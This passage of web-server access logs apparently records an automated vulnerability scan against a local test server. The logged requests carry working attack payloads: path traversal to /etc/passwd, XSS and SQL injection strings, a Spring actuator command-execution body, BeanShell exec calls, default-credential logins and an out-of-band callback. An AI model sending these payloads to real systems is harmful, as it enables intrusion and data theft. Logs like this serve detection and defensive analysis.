HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test/test.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"action=wpcf7r_get_nonce¶m=wp_rest","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"userName=admin&userPassword=dolphinscheduler123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dolphinscheduler/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"cmd=id&opts=&timeout=5","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/297MdtTaGLtuIvzsEe7kqcU5DVl.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.198","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"dir=%2Fetc%2F&onlyFiles=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example%E3%80%82com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/info.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"297MdotxG8DN5cDFRKkU89dIMjU.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sm935/index.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OpenAM-11.0.0/ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/user.php HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi?7 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager?type=Files HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"bsh.script=exec(\x22cat+/etc/passwd\x22);&bsh.servlet.output=raw","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/oauth2/..;/ccversion/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /browser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"{\x0D\x0A \x22name\x22:\x22spring.datasource.hikari.connection-test-query\x22,\x0D\x0A \x22value\x22:\x22CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('whoami');\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/env HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22supported_type\x22\x0D\x0A\x0D\x0Atxt%\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22size_limit\x22\x0D\x0A\x0D\x0A5242880\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Adnd_codedropz_upload\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22type\x22\x0D\x0A\x0D\x0Aclick\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22upload-file\x22; filename=\x22297MbCNNyDHxjktUHLSZtTlNI8g.txt%\x22\x0D\x0AContent-Type: application/x-httpd-php\x0D\x0A\x0D\x0ACVE-2020-12800-297MbCNNyDHxjktUHLSZtTlNI8g\x0D\x0A-----------------------------350278735926454076983690555601--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/nodes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/297MbCNNyDHxjktUHLSZtTlNI8g.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://c9v8hs0smpv8c6ag07h071qo8y9miae7s.oast.online\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /header.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login?redirect=%2F HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.997","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /footer.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 